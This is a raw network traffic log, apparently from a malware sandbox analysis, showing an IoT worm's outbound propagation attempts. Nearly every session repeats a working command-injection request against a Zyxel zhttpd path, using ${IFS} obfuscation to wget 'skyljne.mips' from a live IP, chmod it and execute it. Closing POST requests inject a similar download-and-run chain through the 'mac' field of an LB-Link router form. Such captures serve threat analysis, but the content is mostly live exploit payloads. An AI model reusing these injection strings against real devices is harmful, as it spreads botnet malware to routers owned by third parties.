                                          Jan 14, 2024 15:46:23.133245945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6087192.168.2.235188458.155.170.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133300066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6088192.168.2.235043214.124.17.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133312941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6089192.168.2.2347524134.215.30.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133346081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6090192.168.2.235122641.223.53.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133400917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6091192.168.2.2338160134.186.169.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133433104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6092192.168.2.233337853.112.237.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133460045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6093192.168.2.234048632.108.124.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133492947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6094192.168.2.2337580207.181.18.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133522987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6095192.168.2.2344468107.65.217.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133569002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6096192.168.2.2346830173.16.245.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133589983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6097192.168.2.236006461.78.185.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133599997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6098192.168.2.2355496114.214.69.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133646011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6099192.168.2.235645699.216.73.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133693933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6100192.168.2.2357024142.224.130.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133704901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6101192.168.2.23393122.35.242.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133732080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6102192.168.2.233335438.14.28.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133769989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6103192.168.2.235232666.164.193.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133783102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6104192.168.2.2338380219.14.177.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133801937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6105192.168.2.2352378111.204.0.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133819103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6106192.168.2.2339372194.136.196.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133857012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6107192.168.2.2352796210.250.89.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133861065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6108192.168.2.2338542172.134.10.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133894920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6109192.168.2.2356558123.49.79.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133935928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6110192.168.2.2337718186.131.58.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.133971930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6111192.168.2.2354360108.109.92.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.134006977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6112192.168.2.23466229.219.221.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.134020090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6113192.168.2.235485882.202.76.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.134051085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6114192.168.2.235194617.45.103.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.134067059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6115192.168.2.2347006170.77.253.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.134088993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6116192.168.2.2354246198.76.169.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.134118080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6117192.168.2.2351836199.109.224.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.134152889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6118192.168.2.2346136170.161.28.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.134188890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6119192.168.2.233996648.74.128.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.134206057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6120192.168.2.2349244213.74.146.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.136482000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6121192.168.2.234663080.50.211.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137006998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6122192.168.2.2354758136.182.219.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137032986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6123192.168.2.233640034.20.69.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137049913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6124192.168.2.233758444.79.144.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137079000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6125192.168.2.236001280.149.126.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137106895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6126192.168.2.2349798204.74.153.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137161970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6127192.168.2.236029420.130.86.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137182951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6128192.168.2.235747279.159.28.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137217045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6129192.168.2.2356516112.215.18.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137254000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6130192.168.2.2359788194.203.118.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137285948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6131192.168.2.2337506153.254.21.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137320995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6132192.168.2.2344730166.129.126.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137360096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6133192.168.2.2343450200.241.249.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137398958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6134192.168.2.233933091.226.221.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137425900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6135192.168.2.235238675.60.125.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137469053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6136192.168.2.2340304162.30.18.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137479067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6137192.168.2.234946452.67.159.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137491941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6138192.168.2.233847891.195.230.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.137507915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6139192.168.2.2349448124.197.149.1248080
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:23.462610960 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:24.959717035 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:26.719460011 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                          Jan 14, 2024 15:46:30.430949926 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                          Cookie: user=admin
                                          Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                          Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6140192.168.2.233289059.8.2.798080
                                          TimestampBytes transferredDirectionData
